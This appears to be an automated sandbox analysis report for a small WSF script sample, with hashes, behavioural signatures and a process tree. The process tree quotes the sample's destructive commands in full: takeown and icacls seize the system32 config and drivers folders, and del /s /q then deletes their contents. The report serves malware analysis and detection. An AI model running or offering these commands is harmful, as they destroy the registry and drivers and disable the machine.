Analysis
-
max time kernel
144s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
15-08-2024 21:32
Static task
static1
Behavioral task
behavioral1
Sample
file.wsf
Resource
win7-20240704-en
General
-
Target
file.wsf
-
Size
2KB
-
MD5
a5248e8a553244ebf5fe783d59068860
-
SHA1
f866fc5f1d41e8cf209b3ea253f49a9caebb0012
-
SHA256
e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
-
SHA512
7f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 4600 takeown.exe 4328 takeown.exe 4404 icacls.exe 3980 icacls.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation WScript.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exeicacls.exeicacls.exepid process 4600 takeown.exe 4328 takeown.exe 4404 icacls.exe 3980 icacls.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings cmd.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
takeown.exedescription pid process Token: SeTakeOwnershipPrivilege 4328 takeown.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exeWScript.execmd.execmd.exedescription pid process target process PID 3940 wrote to memory of 3780 3940 cmd.exe WScript.exe PID 3940 wrote to memory of 3780 3940 cmd.exe WScript.exe PID 3780 wrote to memory of 4220 3780 WScript.exe cmd.exe PID 3780 wrote to memory of 4220 3780 WScript.exe cmd.exe PID 3780 wrote to memory of 3288 3780 WScript.exe cmd.exe PID 3780 wrote to memory of 3288 3780 WScript.exe cmd.exe PID 4220 wrote to memory of 4600 4220 cmd.exe takeown.exe PID 4220 wrote to memory of 4600 4220 cmd.exe takeown.exe PID 3288 wrote to memory of 4328 3288 cmd.exe takeown.exe PID 3288 wrote to memory of 4328 3288 cmd.exe takeown.exe PID 4220 wrote to memory of 4404 4220 cmd.exe icacls.exe PID 4220 wrote to memory of 4404 4220 cmd.exe icacls.exe PID 3288 wrote to memory of 3980 3288 cmd.exe icacls.exe PID 3288 wrote to memory of 3980 3288 cmd.exe icacls.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "copy C:\Users\Admin\AppData\Local\Temp\file.wsf thescript.vbs && start thescript.vbs"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3940 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\thescript.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:4220 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\config\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4600
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\config\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&13⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\system32\takeown.exetakeown /f c:\windows\system32\drivers\*4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:4328
-
-
C:\Windows\system32\icacls.exeicacls c:\windows\system32\drivers\* /grant everyone:(f)4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3980
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4088,i,11708048364682646792,608099842549576907,262144 --variations-seed-version --mojo-platform-channel-handle=1020 /prefetch:81⤵PID:3704
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5a5248e8a553244ebf5fe783d59068860
SHA1f866fc5f1d41e8cf209b3ea253f49a9caebb0012
SHA256e7af76261c2990bf6feae42d867deb9c54e4336a58e6160511f3062ecab3532c
SHA5127f7fafcee64a9d9d5ca06e19e011f6e485e931b06a256bf924fa06e7ade8ac25458dc8980c6409c16a22f93602ea5e6e872754966bf67a92a7b3ab4b749465b8
-
Filesize
78B
MD5ece02545122cc48c9d8afaf3f94dd04f
SHA18e07b6da685faad07f8413230a95ce0ae8987e0d
SHA2565098743dbbd65767e7795bb819c00d091a749f0905fe0d496a06fc192efd0206
SHA512e6c8df55b9845ea00301b0560321489cf064bfc02793495942e216a25f76b809a61d90ab0ce8ce4e514f626f368861c9f9b7814e3730e6482f0e2f40e88a2eb5